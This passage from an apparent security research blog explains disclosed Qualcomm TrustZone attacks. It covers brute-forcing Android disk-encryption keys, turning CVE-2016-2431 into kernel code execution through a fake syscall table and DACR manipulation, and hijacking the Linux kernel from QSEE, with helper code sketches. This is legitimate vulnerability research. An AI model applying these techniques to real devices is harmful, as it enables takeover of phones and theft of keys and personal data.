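                n: int = 1 << 15, r: int = 1 << 3, p: int = 1 << 1
                ) -> Optional[bytes]:
    """Return the first word whose scrypted IK matches the footer's value."""
    for word in words:
        if hmac.compare_digest(scrypted_ik(word, salt, sign, n, r, p), target):
            return word
    return None
```

Each guess costs three scrypt invocations plus one modular exponentiation, which is why a pure-Python version is slow and why the scrypt-heavy part is the natural candidate for a GPU port.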

Here's what it looks like after running it on my own Nexus 6, encrypted using the password "secret":

Lastly, I've also written a script which can be used to decrypt already-generated KeyMaster key blobs. If you simply have a KeyMaster key blob that you'd like to decrypt using the leaked keys, you can do so by invoking the script km_keymaster.py, like so:

Final Thoughts

Full disk encryption is used world-wide, and can sometimes be instrumental to ensuring the privacy of people's most intimate pieces of information. As such, I believe the encryption scheme should be designed to be as "bullet-proof" as possible, against all types of adversaries. As we've seen, the current encryption scheme is far from bullet-proof, and can be hacked by an adversary or even broken by the OEMs themselves (if they are coerced to comply with law enforcement).

I hope that by shedding light on the subject, this research will motivate OEMs and Google to come together and think of a more robust solution for FDE. I realise that in the Android ecosystem this is harder to guarantee, due to the multitude of OEMs. However, I believe a concerted effort on both sides can help the next generation of Android devices be truly "uncrackable".

TrustZone Kernel Privilege Escalation (CVE-2016-2431)

2016-06-15T14:27:00.000+03:00

In this blog post we'll continue our journey from zero permissions to code execution in the TrustZone kernel. Having previously elevated our privileges to QSEE, we are left with the task of exploiting the TrustZone kernel itself.

"Why?", I hear you ask.

Well... There are quite a few interesting things we can do solely from the context of the TrustZone kernel. To name a few:

We could hijack any QSEE application directly, thus exposing all of its internal secrets. For example, we could directly extract the stored real-life fingerprint or various secret encryption keys (more on this in the next blog post!).
We could disable the hardware protections provided by the SoC's XPUs, allowing us to read and write directly to all of the DRAM. This includes the memory used by the peripherals on the board (such as the modem).
As we've previously seen, we could blow the QFuses responsible for various device features. In certain cases, this could allow us to unlock a locked bootloader (depending on how the lock is implemented).

So now that we've set the stage, let's start by surveying the attack surface!

Attack Surface

Qualcomm's Secure Environment Operating System (QSEOS), like most operating systems, provides services to the applications running under it by means of system-calls.

As you know, operating systems must take great care to protect themselves from malicious applications. In the case of system-calls, this means the operating system mustn't trust any information provided by an application and should always validate it. This forms a "trust-boundary" between the operating system itself and the running applications.

So... This sounds like a good place to start looking! Let's see if the TrustZone kernel does, in fact, cover all the bases.

In the "Secure World", just like the "Normal World", user-space applications can invoke system-calls by issuing the "SVC" instruction. All system-calls in QSEE are invoked via a single function, which I've dubbed "qsee_syscall":

As we can see, the function is a simple wrapper which does the following:

Stores the syscall number in R0
Stores the arguments for the syscall in R4-R9
Invokes the SVC instruction with the code 0x1400
Returns the syscall result via R0

So we know how syscalls are invoked; now let's look for the code in the TrustZone kernel which is used to handle SVC requests. Recall that, just as in the "Normal World", the "Secure World" must register the address of the vector table to which the processor jumps when an SVC instruction is executed.

Unlike SMC instructions (used to request "Secure World" services from the "Normal World"), which use the MVBAR (Monitor Vector Base Address Register) to provide the vector's base address, SVC instructions simply use the "Secure" version of the VBAR (Vector Base Address Register).

Accessing the VBAR is done using the MRC/MCR opcodes, with the following operands:

So this means we can simply search the TrustZone kernel for an MCR opcode with these operands, and we should be able to find the address written to the secure copy of the VBAR. Indeed, searching for the opcode in the TrustZone image returns the following match:
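To make the search concrete, here is a minimal C sketch of it. VBAR is written with `MCR p15, 0, <Rt>, c12, c0, 0`; the code encodes the ARM (A1) form of that instruction and scans an image, assumed to be already loaded as an array of 32-bit words, while ignoring the Rt field so that any source register matches. Only the unconditional (AL) form is matched, and the function names are illustrative rather than taken from any tool.

```c
#include <stddef.h>
#include <stdint.h>

/* Encode an ARM (A1) MCR instruction:
 * cond | 1110 | opc1 | 0 | CRn | Rt | coproc | opc2 | 1 | CRm */
static uint32_t encode_mcr(uint32_t cond, uint32_t coproc, uint32_t opc1,
                           uint32_t rt, uint32_t crn, uint32_t crm, uint32_t opc2)
{
    return (cond << 28) | (0xEu << 24) | (opc1 << 21) | (crn << 16) |
           (rt << 12) | (coproc << 8) | (opc2 << 5) | (1u << 4) | crm;
}

/* Return the index of the first "MCR p15, 0, Rx, c12, c0, 0" (any Rx),
 * or -1 if there is none. MRC (the read form, L bit set) does not match. */
static long find_vbar_write(const uint32_t *words, size_t count)
{
    const uint32_t rt_mask = 0xFu << 12;                      /* ignore the source register */
    const uint32_t pattern = encode_mcr(0xE, 15, 0, 0, 12, 0, 0);  /* 0xEE0C0F10 */

    for (size_t i = 0; i < count; i++) {
        if ((words[i] & ~rt_mask) == pattern)
            return (long)i;
    }
    return -1;
}
```

Once a match is found, the instructions leading up to it (whatever loads Rt) reveal the vector table's address.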

According to the ARM documentation, the "Secure Vector" has the following structure:
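As a rough illustration, the sketch below lists the exception entry offsets relative to VBAR for an ARMv7-A (non-Monitor) vector table; the SVC entry is at VBAR + 0x08. Each entry is a single instruction, commonly a branch (sometimes a PC-relative load instead). The helper assumes the entry is a plain ARM `B <label>` and computes where it leads; the enum and function names are hypothetical.

```c
#include <stdint.h>

/* Exception entry offsets relative to VBAR (ARMv7-A, non-Monitor table). */
enum vector_offset {
    VEC_RESET          = 0x00,
    VEC_UNDEFINED      = 0x04,
    VEC_SVC            = 0x08,
    VEC_PREFETCH_ABORT = 0x0C,
    VEC_DATA_ABORT     = 0x10,
    /* 0x14 is not used in this table */
    VEC_IRQ            = 0x18,
    VEC_FIQ            = 0x1C,
};

/* If 'insn' (located at address 'pc') is an ARM "B <label>", store the branch
 * target in *target and return 1; otherwise return 0. */
static int decode_arm_branch(uint32_t insn, uint32_t pc, uint32_t *target)
{
    if ((insn >> 28) == 0xFu)                    /* cond 1111 here would be BLX */
        return 0;
    if ((insn & 0x0F000000u) != 0x0A000000u)     /* bits 27..24 must be 1010: B, not BL */
        return 0;

    uint32_t offset = (insn & 0x00FFFFFFu) << 2; /* imm24:'00' */
    if (insn & 0x00800000u)
        offset |= 0xFC000000u;                   /* sign-extend to 32 bits */

    *target = pc + 8u + offset;                  /* in ARM state the PC reads as address + 8 */
    return 1;
}
```

With the VBAR value in hand, decoding the word at `vbar + VEC_SVC` gives the address where tracing of the SVC handler can begin.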

At this point we can start tracing the execution from the SVC handler in the vector table.

The code initially does some boilerplate preparations, such as saving the passed arguments and context, and finally gets to the main entry point which is used to actually handle the requested system-call. Qualcomm have helpfully left a single logging string in this function containing its original name "app_syscall_handler", so we'll use that name as well. Let's take a look at the function's high-level graph overview:

app_syscall_handler graph overview

...Okay... That's a lot of code.

However, on closer inspection, the graph seems very shallow, so while there are a lot of different code-paths, they are all relatively simple. In fact, the function is simply a large switch-case, which uses the syscall command-code supplied by the user (in R0) in order to select which syscall should be executed.

snippet from app_syscall_handler's switch-case

But something's obviously missing! Where are the validations on the arguments passed in by the user? app_syscall_handler makes no such effort, so the validation can only possibly be in the syscalls themselves... Time to dig deeper once more!

As you can see in the screenshot above, most of the syscalls aren't directly invoked, but rather indirectly called by using a set of globally-stored pointers, each pointing to a different table of supported system-calls. I've taken to using the following (imaginative) names to describe them:

Cross-referencing these pointers reveals the locations of the actual system-call tables to which they point. The tables' structure is very simple - each entry contains a 32-bit number representing the syscall number within the table, followed by a pointer to the syscall handler function itself. Here is one such table:
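The table layout just described maps naturally onto a C struct. The sketch below assumes the 32-bit layout (number, then handler address) and that the number of entries is already known, since how the real tables are terminated isn't covered here; `find_handler` is a hypothetical helper for resolving a syscall number to its handler while reversing.

```c
#include <stddef.h>
#include <stdint.h>

/* One entry of a QSEOS syscall table as described above (32-bit ARM):
 * the syscall number within the table, then a pointer to its handler. */
struct syscall_entry {
    uint32_t number;
    uint32_t handler;   /* handler address inside the TrustZone kernel */
};

/* Return the handler registered for 'number', or 0 if the table has none. */
static uint32_t find_handler(const struct syscall_entry *table, size_t count,
                             uint32_t number)
{
    for (size_t i = 0; i < count; i++) {
        if (table[i].number == number)
            return table[i].handler;
    }
    return 0;
}
```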

As you can see, there is some logic behind the "grouping" of each set of syscalls. For example, the sixth table (above) contains only syscalls relating to memory management (although, admittedly, most tables are more loosely cobbled together).

Finally, let's take a look at a simple syscall which must perform validation in order to function correctly. A good candidate would be a syscall which receives a pointer as an argument, and subsequently writes data to that pointer. Obviously, this is incredibly dangerous, and would therefore require extra validation to make sure the pointer is strictly within the memory regions belonging to the QSEE application.

Digging through the widevine application, we find the following syscall:

This syscall receives four arguments:

A pointer to a "cipher" object, which has previously been initialized by calling "qsee_cipher_init"
The type of parameter which is going to be retrieved from the cipher object
The address to which the read parameter will be written
An unknown argument

Of course, QSEE applications always play nice and set the output pointer to a sensible address, but what's actually going on under the hood in the TrustZone kernel? Well, we now know enough to pop the literary hood and check for ourselves. Going through app_syscall_handler's switch-case, we find the syscall table and the offset of "qsee_cipher_get_param" within it, leading us to the kernel's actual implementation of the syscall:

This is our lucky day! Apparently the TrustZone kernel blindly trusts nearly all the parameters passed in by the user. Although the function does perform some sanity checks to make sure the given pointers are not NULL and the param_type is within the allowed range, it automatically trusts the user-supplied "output" argument. More importantly, we can see that if we use the parameter type 3, the function will write a single byte from our cipher to the supplied pointer!

Note that this was more than just a stroke of luck - taking a peek at the implementation of all the other syscalls reveals that the TrustZone kernel does not perform any validation on QSEE-supplied arguments (more specifically, it freely uses any given pointers), meaning that at the time all syscalls were vulnerable.
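For contrast, here is a minimal sketch of the kind of check the kernel was missing: before dereferencing a user-supplied pointer, make sure the whole range lies inside the calling application's memory. It assumes, for simplicity, that each application owns a single contiguous region; the struct and function names are hypothetical and not taken from QSEOS.

```c
#include <stdint.h>

/* Hypothetical description of the memory owned by the calling QSEE app. */
struct app_region {
    uint32_t start;   /* first byte of the app's region */
    uint32_t end;     /* one past the last byte */
};

/* Return 1 if [ptr, ptr + len) lies entirely inside the app's region.
 * Comparing len against end - ptr avoids computing ptr + len, which could
 * wrap around and slip past a naive "ptr + len <= end" check. */
static int range_in_app(const struct app_region *r, uint32_t ptr, uint32_t len)
{
    if (ptr < r->start || ptr > r->end)
        return 0;
    return len <= r->end - ptr;
}
```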

For the sake of our exploit, we'll stick to qsee_cipher_get_param, since we've already started reviewing it.

Full Read-Write

As always, before we start writing an exploit, let's try and improve our primitives. This is nearly always worth our while; the more time we spend on improving the primitives, the cleaner and more robust our exploit will be. We might even end up saving time in the long-run.

Right now we have an uncontrolled-write primitive - we can write some uncontrolled data from our cipher object to a controlled memory location. Of course, it would be much easier if we were able to control the written data as well.

Intuitively, since "qsee_cipher_get_param" is used to read a parameter from a cipher object, it stands to reason that there would be a matching function which is used to set the parameter. Indeed, searching for "qsee_cipher_set_param" in the widevine application confirms our suspicion:

Let's take a look at the implementation of this syscall:

Great!

It looks like we can set the parameter's value by using the same param_type value (3), and supplying a pointer to a controlled memory region within QSEE which will contain the byte we would later like to write. The TrustZone kernel will happily store the value we supplied in the cipher object, allowing us to later write that value to any address by calling qsee_cipher_get_param with our target pointer.

Putting this together, we now have a relatively clean write-what-where primitive. Here's a run-down of our new primitive:

Initialize a cipher object using qsee_cipher_init
Allocate a buffer in QSEE
Write the wanted byte to our allocated QSEE buffer
Call qsee_cipher_set_param using our QSEE-allocated buffer as the param_value argument
Call qsee_cipher_get_param, but supply the target address as the output argument

You might have also noticed that we could use the inverse of this in order to get an arbitrary read primitive. All we would need to do is call qsee_cipher_set_param supplying the address we'd like to read as the param_value argument - this'll cause the TrustZone kernel to read the value at that address and store it in our cipher object. Then, we can simply retrieve that value by calling qsee_cipher_get_param.
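The way the two primitives compose can be shown with a toy model. In the sketch below, `toy_set_param` and `toy_get_param` are hypothetical stand-ins for the kernel side of the two syscalls: they model only parameter type 3 (a single byte) and, like the real kernel, dereference caller-supplied pointers without validation. The real qsee_cipher_* signatures and the cipher object layout are not reproduced, and "memory" is just an ordinary array.

```c
#include <stdint.h>

/* Toy cipher object: only the single-byte parameter (type 3) is modelled. */
struct toy_cipher {
    uint8_t param3;
};

/* Kernel side of set_param: reads one byte from an unvalidated pointer. */
static void toy_set_param(struct toy_cipher *c, int type, const uint8_t *value)
{
    if (type == 3)
        c->param3 = *value;
}

/* Kernel side of get_param: writes one byte to an unvalidated pointer. */
static void toy_get_param(const struct toy_cipher *c, int type, uint8_t *out)
{
    if (type == 3)
        *out = c->param3;
}

/* write-what-where: stage the byte in our own buffer, then let get_param store it. */
static void write_byte(struct toy_cipher *c, uint8_t *target, uint8_t value)
{
    uint8_t staging = value;          /* plays the role of the QSEE-allocated buffer */
    toy_set_param(c, 3, &staging);
    toy_get_param(c, 3, target);
}

/* Arbitrary read: let set_param fetch the byte at 'source', then read it back. */
static uint8_t read_byte(struct toy_cipher *c, const uint8_t *source)
{
    uint8_t result = 0;
    toy_set_param(c, 3, source);
    toy_get_param(c, 3, &result);
    return result;
}

/* Byte-at-a-time helper: write a 32-bit little-endian value. */
static void write_u32(struct toy_cipher *c, uint8_t *target, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        write_byte(c, target + i, (uint8_t)(v >> (8 * i)));
}
```

Since each call moves a single byte, wider reads and writes are simply loops over the byte primitives, as `write_u32` shows.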

Writing an Exploit

Using the primitives we just crafted, we finally have full read-write access to the TrustZone kernel. All that's left is to achieve code-execution within the TrustZone kernel in a controllable way.

The first obvious choice would be to write some shellcode into the TrustZone kernel's code segments and execute it. However, there's a tiny snag - on newer devices, the TrustZone kernel's code segments are protected by special memory protection units (called XPUs), which prevent us from directly modifying the kernel's code (as well as many other protected memory regions). We could still modify the kernel's code (more information in the next blog post!), but it would be much harder...

...However, we have already come across a piece of dynamically allocated code in the "Secure World" - the QSEE applications themselves!

So here's a plan - if we could ignore the access-protection bits on the code pages of the QSEE applications (which are all marked as read-execute), we should be able to directly modify them from the context of the TrustZone kernel. Then, we could simply jump to our newly-created code from the context of the kernel in order to execute any piece of code we'd like.

Luckily, ignoring the access-protection bits can actually be done without modifying the translation table at all, by using a convenient feature of the ARM MMU called "domains".

In the ARM translation table, each entry has a field which lists its permissions, as well as a 4-bit field denoting the "domain" to which the translation belongs.

Within the ARM MMU, there is a register called the DACR (Domain Access Control Register). This 32-bit register has 16 pairs of bits, one pair for each domain, which specify how accesses to translations in the given domain are treated: "No access" (0b00) generates a fault for any access, "Client" (0b01) checks each access against the translation's access permissions, and "Manager" (0b11) does not check the access permissions at all.

Whenever the processor attempts to access a given memory address, the MMU first looks up the DACR field for the domain of the relevant translation. Only if that domain is set to "Client" are the access permissions in the translation checked (and a fault generated if the access isn't allowed).

If the domain is set to "Manager", the permission check is skipped entirely, and the access is allowed.

This means that simply setting the DACR's value to 0xFFFFFFFF (i.e., every domain set to "Manager") will cause the MMU to allow both read and write access to any mapped memory address without generating a permission fault (and, more importantly, without having to modify the translation table).
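The bit arithmetic behind that value is small enough to spell out. The sketch below assumes the ARMv7 short-descriptor DACR layout, where domain n occupies bits [2n+1:2n]; the helper names are hypothetical. Setting all sixteen fields to Manager (0b11) yields exactly 0xFFFFFFFF.

```c
#include <stdint.h>

/* ARMv7 short-descriptor DACR: 16 two-bit fields, domain n at bits [2n+1:2n]. */
enum dacr_access {
    DACR_NO_ACCESS = 0x0,   /* every access to the domain faults */
    DACR_CLIENT    = 0x1,   /* accesses are checked against the permission bits */
    DACR_MANAGER   = 0x3,   /* permission bits are not checked */
};

/* Return 'dacr' with the field for 'domain' (0..15) replaced by 'access'. */
static uint32_t dacr_set(uint32_t dacr, unsigned domain, enum dacr_access access)
{
    uint32_t shift = 2u * domain;
    return (dacr & ~(0x3u << shift)) | ((uint32_t)access << shift);
}

/* Extract the two-bit field for 'domain' from 'dacr'. */
static enum dacr_access dacr_get(uint32_t dacr, unsigned domain)
{
    return (enum dacr_access)((dacr >> (2u * domain)) & 0x3u);
}

/* Build a DACR value with every domain set to Manager. */
static uint32_t dacr_all_manager(void)
{
    uint32_t dacr = 0;
    for (unsigned d = 0; d < 16; d++)
        dacr = dacr_set(dacr, d, DACR_MANAGER);
    return dacr;
}
```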

Moreover, the TrustZone kernel already has a piece of code that is used to set the value of the DACR, which we can simply call using our own value (0xFFFFFFFF) in order to fully set the DACR.

TrustZone kernel function which sets the DACR

All that said, we're still missing a key component in our exploit! All we have right now is read/write access to the TrustZone kernel; we still need a way to execute arbitrary functions within the TrustZone kernel and then restore execution. This would allow us to change the DACR using the gadget above and subsequently write and execute shellcode in the "Secure World".

Hijacking Syscalls

As we've seen, most QSEE system-calls are invoked indirectly by using a set of globally-stored pointers, each of which points to a corresponding system-call table.

While the system-call tables themselves are located in a memory region that is protected by an XPU, the pointers to these tables are not protected in any way! This is because they are only populated during runtime, and as such must reside in a modifiable memory region.

This little tidbit actually makes it much simpler for us to hijack code execution in the kernel in a controllable manner!

All we need to do is allocate our own "fake" system-call table. Our table would be identical to the real system-call table, apart from a single "poisoned" entry, which would point to a function of our choice (instead of pointing to the original syscall handler).

It should be noted that since we don't want to cause any adverse effects for other QSEE applications, it is important that we choose to modify an entry corresponding to an unused (or rarely used) system call.

Once we've crafted the "fake" syscall table, we can simply use our write primitive in order to modify the global syscall table pointer to point to our newly created "fake" table.
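Building the "fake" table amounts to a copy plus a single patched entry. The sketch below assumes the entry layout described above (syscall number, then handler address) and that the real table has already been read out, for example with the read primitive; `build_fake_table` and its parameters are hypothetical. The address of `fake` is what would then be written over the global table pointer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Entry layout described above: syscall number, then handler address. */
struct syscall_entry {
    uint32_t number;
    uint32_t handler;
};

/* Copy 'count' entries from 'real' into 'fake' and redirect the entry for
 * 'victim' to 'payload'. Returns 0 on success, -1 if 'victim' is absent. */
static int build_fake_table(struct syscall_entry *fake,
                            const struct syscall_entry *real, size_t count,
                            uint32_t victim, uint32_t payload)
{
    memcpy(fake, real, count * sizeof *real);   /* every other syscall keeps working */
    for (size_t i = 0; i < count; i++) {
        if (fake[i].number == victim) {
            fake[i].handler = payload;          /* the single "poisoned" entry */
            return 0;
        }
    }
    return -1;
}
```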

Then, whenever the "poisoned" system-call is invoked from QSEE, our function will be executed within the context of the TrustZone kernel! Not only that, but app_syscall_handler will also conveniently make sure the return value from our executed code will be returned to QSEE upon returning from the SVC call.

Putting it all together

By now we have all the pieces we need to write a simple exploit which writes a chunk of shellcode in the "Secure World", executes that shellcode in the context of the TrustZone kernel, and restores execution.

Here's what we need to do:

Allocate a "fake" syscall table in QSEE
Use the write primitive to overwrite the syscall table pointer to point to our crafted "fake" syscall table
Set the single "poison" syscall entry in the "fake" syscall table to point to the DACR-modifying function in the TrustZone kernel
Invoke the "poison" syscall in order to call the DACR-modifying function in the TrustZone kernel - thus setting the DACR to 0xFFFFFFFF
Use the write gadget to write our shellcode directly to a code page in QSEE belonging to our QSEE application
Invalidate the instruction cache (to avoid conflicts with the newly written code)
Set the single "poison" syscall entry in the "fake" syscall table to point to the written shellcode
Invoke the "poison" syscall in order to jump to our newly-written shellcode from the context of the TrustZone kernel!

Here's a small illustration detailing all of these steps:

Playing With The Code

As always, the full exploit source code is available here:

https://github.com/laginimaineb/cve-2016-2431

The exploit builds upon the previous QSEE exploit in order to achieve QSEE code-execution. If you'd like to play around with it, you might want to use the following two functions:

tzbsp_execute_function - calls the given function with the given arguments within the context of the TrustZone kernel.

tzbsp_load_and_exec_file - loads the shellcode from a given file and executes it within the context of the TrustZone kernel.

I've also included a small shell script called "build_shellcode.sh", which can be used to build the shellcode supplied in the file "shellcode.S" and write it into a binary blob (which can then be loaded and executed using the function above).

Have fun!

Timeline

13.10.2015 - Vulnerability disclosed and minimal PoC sent
15.10.2015 - Initial response from Google
16.10.2015 - Full exploit sent to Google
30.03.2016 - CVE assigned
02.05.2016 - Issue patched and released in the Nexus public bulletin

As far as I know, this vulnerability was present in all devices and all versions of QSEOS until it was finally patched on 02.05.2016. This means that, up to that point, obtaining code-execution within QSEE was effectively equivalent to having code-execution within the TrustZone kernel (i.e., fully controlling nearly every aspect of the device).

Since there had been no public research into QSEE up to that point, this issue went undiscovered. Hopefully, further research into QSEE and TrustZone in general will help uncover similar issues and make the security boundary between QSEOS and QSEE stronger.

War of the Worlds - Hijacking the Linux Kernel from QSEE

2016-05-05T22:11:00.001+03:00

After seeing a full QSEE vulnerability and exploit in the previous blog post, I thought it might be nice to see some QSEE shellcode in action.

As we've previously discussed, QSEE is extremely privileged - not only can it interact directly with the TrustZone kernel and access the hardware-secured TrustZone file-system (SFS), but it also has some form of direct access to the system's memory.

In this blog post we'll see how we can make use of this direct memory access in the "Secure World" in order to hijack the Linux Kernel running in the "Normal World", without even requiring a kernel vulnerability.

Interacting with QSEE

As we've seen in the previous blog post, when a user-space Android application would like to interact with a trustlet running in QSEE, it must do so by using a special Linux Kernel device, "qseecom". This device issues SMC calls which are handled by QSEOS, and are passed on to the requested trustlet in order to be handled.

Each command issued to a trustlet has a pair of associated input and output buffers, which are usually used to convey all the information to and from the "Normal World" and the trustlet.

However, there are some special use-cases in which a faster mode of communication is required - for example, when decrypting (or encrypting) large DRM-protected media files, the communication cost must be as small as possible in order to enable "smooth" playback.

Moreover, some devices include trustlets which are meant to assure the device's integrity (mostly in corporate settings). For example, Samsung provides "TrustZone-based Integrity Measurement Architecture" (TIMA) - a framework used to assure device integrity. According to Samsung, TIMA performs (among other things) periodic measurements of the "Normal World" kernel, and verifies that they match the original factory kernel.

So... Trustlets need fast communication with the "Normal World" and also need some ability to inspect the system's memory - sounds dangerous! Let's take a closer look.

Sharing (Memory) is Caring

Continuing our research on the "widevine" trustlet, let's take a look at the command used to DRM-encrypt a chunk of memory:

As we can see above, the function receives two pointers denoting the "input" and "output" buffers, respectively. These can be any arbitrary buffers provided by the user, so it stands to reason that some preparation would be needed in order to access them. Indeed, we can see that the preparation is done by calling "cacheflush_register", and, once the encryption process is done, the buffers are released by calling "cacheflush_deregister".

Upon closer inspection, "cacheflush_register" and "cacheflush_deregister" are simple wrappers around a couple of QSEE syscalls (each):

cacheflush_register: qsee_register_shared_buffer, qsee_prepare_shared_buf_for_secure_read
cacheflush_deregister: qsee_prepare_shared_buf_for_nosecure_read, qsee_deregister_shared_buffer

So what do these syscalls do?

Looking at the relevant handling code in QSEOS reveals that these names are a little misleading - in fact, "qsee_prepare_shared_buf_for_secure_read" merely invalidates the given range in the data cache (so that QSEE will observe the updated data), and similarly "qsee_prepare_shared_buf_for_nosecure_read" cleans the given range in the data cache, writing any dirty lines back to memory (so that the "Normal World" will see the changes made by QSEE).

As for "qsee_register_shared_buffer" - this syscall is used to actually map the given ranges into QSEE. Let's see what it does:

After some sanity checks, the function checks whether the given memory region is within the "Secure World". If that's the case, it could be that the trustlet is trying to attack the TrustZone kernel by mapping-in and modifying memory regions used by TZBSP or QSEOS. Since that would be extremely dangerous, only a select few (six) specific regions within the "Secure World" can be mapped into QSEE. If the given address range is not within any of these special "tagged" regions, the operation is denied.

However - for any address in the "Normal World", there are no extra checks made! This means that QSEOS will happily allow us to use "qsee_register_shared_buffer" in order to map in any physical address in the "Normal World".
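The decision logic described above can be summarised in a few lines. This is a simplified model written for illustration, not QSEOS code: it assumes the "Secure World" is a single physical range and the tagged regions are given as a list, and all names are hypothetical. The final `return 1` is the problem.

```c
#include <stddef.h>
#include <stdint.h>

/* A physical address range, [start, end). */
struct range {
    uint64_t start;
    uint64_t end;
};

static int contains(const struct range *outer, uint64_t start, uint64_t end)
{
    return start >= outer->start && end <= outer->end;
}

static int overlaps(const struct range *r, uint64_t start, uint64_t end)
{
    return start < r->end && r->start < end;
}

/* Ranges touching the Secure World must fall inside one of the "tagged"
 * regions; anything else is accepted without further checks. */
static int may_map(const struct range *secure_world,
                   const struct range *tagged, size_t n_tagged,
                   uint64_t start, uint64_t len)
{
    uint64_t end = start + len;
    if (len == 0 || end < start)
        return 0;                              /* empty or wrapping range */

    if (overlaps(secure_world, start, end)) {
        for (size_t i = 0; i < n_tagged; i++)
            if (contains(&tagged[i], start, end))
                return 1;
        return 0;                              /* secure memory outside a tagged region */
    }
    return 1;                                  /* Normal World: no further checks */
}
```

Any physical range outside the Secure World, including the pages holding the running Linux Kernel, passes the check unconditionally.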

...Are you pondering what I'm pondering?

Hijacking the Linux Kernel

Since QSEE has read-write access to all of the "Normal World"'s memory (all it needs to do is ask), we should theoretically be able to locate the running Linux Kernel in the "Normal World" directly in physical memory and inject code into it.

As a fun exercise, let's create a QSEE shellcode that doesn't require any kernel symbols - this way it can be used in any QSEE context in order to locate and hijack the running kernel.

Recall that after booting the device, the bootloader uses the data specified in the Android boot image in order to extract the Linux Kernel into a given physical address and execute it:

The physical load address of the Linux Kernel is then available to any process via the world-readable file /proc/iomem:

However, simply knowing where the kernel is loaded does not absolve us of the need to find kernel symbols - there are many different kernel images, each with its own large set of symbols. As such, we need some way to find all of the kernel's symbols dynamically, using the running kernel's memory. Fortunately, all is not lost - remember that the Linux Kernel keeps a list of all kernel symbols internally (!), and allows kernel modules to look up these symbols using a special lookup function - "kallsyms_lookup_name". So how does this work?

As we've previously seen - the names in the kernel's symbol table are compressed using a 256-entry token table generated at build time, so that each name is stored as a short sequence of one-byte indices into that table. The token table is stored within the kernel's image, alongside the descriptors for each symbol denoting the indices in the token table used to decompress its name. And, of course, the actual addresses for all of the symbols are similarly stored in the kernel's image.

In order to access all the information in the symbol table, we must first find it within the kernel's image.

As luck would have it, the first region of the symbol table - the "Symbol Address Table", always begins with two pointers to the kernel's virtual load address (which can be easily calculated from the kernel's physical load address since there's no KASLR). Moreover, the symbol addresses in the table are monotonically nondecreasing addresses within the kernel's virtual address range - a fact which we can use to confirm our suspicion whenever we find two such consecutive pointers to the kernel's virtual load address.
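The heuristic translates directly into a scan. In this minimal sketch, the image is assumed to be available as an array of 32-bit words, `virt_base` is the kernel's virtual load address already computed from its physical address, and `virt_size` bounds the kernel's virtual range; `confirm` is a hypothetical tuning knob for how many following entries must also look like valid, non-decreasing kernel addresses before a match is accepted.

```c
#include <stddef.h>
#include <stdint.h>

/* Look for two consecutive words equal to virt_base, followed by 'confirm'
 * more non-decreasing addresses within [virt_base, virt_base + virt_size).
 * Returns the word index of the table's start, or -1 if not found. */
static long find_symbol_address_table(const uint32_t *words, size_t count,
                                      uint32_t virt_base, uint32_t virt_size,
                                      size_t confirm)
{
    for (size_t i = 0; i + 1 + confirm < count; i++) {
        if (words[i] != virt_base || words[i + 1] != virt_base)
            continue;

        int ok = 1;
        for (size_t j = i + 2; j < i + 2 + confirm; j++) {
            uint32_t a = words[j];
            /* a >= previous >= virt_base, so a - virt_base cannot underflow */
            if (a < words[j - 1] || a - virt_base >= virt_size) {
                ok = 0;
                break;
            }
        }
        if (ok)
            return (long)i;
    }
    return -1;
}
```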

Symbol Address Table

Now that we can find the symbol table within the kernel's image, all we need to do is implement the decompression scheme in order to be able to iterate over it and lookup any symbol. Great!
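Here is a minimal sketch of that decompression and lookup, modelled on how kallsyms_expand_symbol() and kallsyms_lookup_name() work in kernels of that era. Each entry in the names table is a length byte followed by that many token indices; a token index table maps each index to an offset in the token table, which holds NUL-terminated strings; the first expanded character is the symbol's type. Newer kernels changed some of these encodings, and the function names here are illustrative.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Expand the entry starting at names[off] into 'out' (NUL-terminated,
 * truncated to out_len, which must be at least 1) and store its type in
 * *type. Returns the offset of the next entry. */
static size_t expand_symbol(const uint8_t *names, size_t off,
                            const char *token_table, const uint16_t *token_index,
                            char *type, char *out, size_t out_len)
{
    uint8_t len = names[off++];
    size_t pos = 0;
    int have_type = 0;

    for (uint8_t i = 0; i < len; i++) {
        const char *tok = token_table + token_index[names[off + i]];
        for (; *tok != '\0'; tok++) {
            if (!have_type) {              /* first character is the type, e.g. 'T' */
                *type = *tok;
                have_type = 1;
            } else if (pos + 1 < out_len) {
                out[pos++] = *tok;
            }
        }
    }
    out[pos] = '\0';
    return off + len;
}

/* Linear scan over every symbol, like kallsyms_lookup_name().
 * Returns the symbol's address, or 0 if it is not found. */
static uint32_t lookup_name(const uint8_t *names, const uint32_t *addresses,
                            size_t num_syms, const char *token_table,
                            const uint16_t *token_index, const char *wanted)
{
    char name[128];
    char type = 0;
    size_t off = 0;

    for (size_t i = 0; i < num_syms; i++) {
        off = expand_symbol(names, off, token_table, token_index, &type, name, sizeof name);
        if (strcmp(name, wanted) == 0)
            return addresses[i];
    }
    return 0;
}
```

In the real exploit, these tables would be located by walking forward from the symbol address table found in the kernel's image.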

Using the method above to find the kernel's symbol table, we can now locate and hijack any kernel function from QSEE. Following the tradition from the previous kernel exploits, let's hijack an easily accessible function pointer from a very rarely-used network protocol - PPPOLAC.

The function pointers relating to this protocol are stored in the following kernel structure:

Overwriting the "release" pointer in this structure would cause the kernel to execute our crafted function pointer whenever a PPPOLAC socket is closed.
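Once "pppolac_proto_ops" has been resolved, locating the slot to overwrite is simple arithmetic. This sketch assumes the 32-bit ARM layout of struct proto_ops in kernels of that era, which begins with `int family`, `struct module *owner` and then the `release` pointer, so `release` sits at offset 8. It also assumes a linear mapping between the kernel's virtual and physical load addresses (so that the physical address can be mapped in from QSEE). The mirror struct and helper names are hypothetical, and the layout should be checked against the target kernel's headers.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of the first members of struct proto_ops on 32-bit ARM;
 * pointers are modelled as uint32_t so the offsets match the target. */
struct proto_ops32 {
    int32_t  family;
    uint32_t owner;     /* struct module * */
    uint32_t release;   /* int (*release)(struct socket *) */
    uint32_t bind;      /* remaining members omitted */
};

/* Virtual address of the "release" slot, given the symbol's address. */
static uint32_t release_slot(uint32_t proto_ops_virt)
{
    return proto_ops_virt + (uint32_t)offsetof(struct proto_ops32, release);
}

/* Translate a kernel virtual address to the physical address QSEE must map,
 * assuming virt_base corresponds to phys_base (no KASLR, linear mapping). */
static uint32_t kernel_virt_to_phys(uint32_t virt, uint32_t virt_base, uint32_t phys_base)
{
    return virt - virt_base + phys_base;
}
```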

Putting it all together

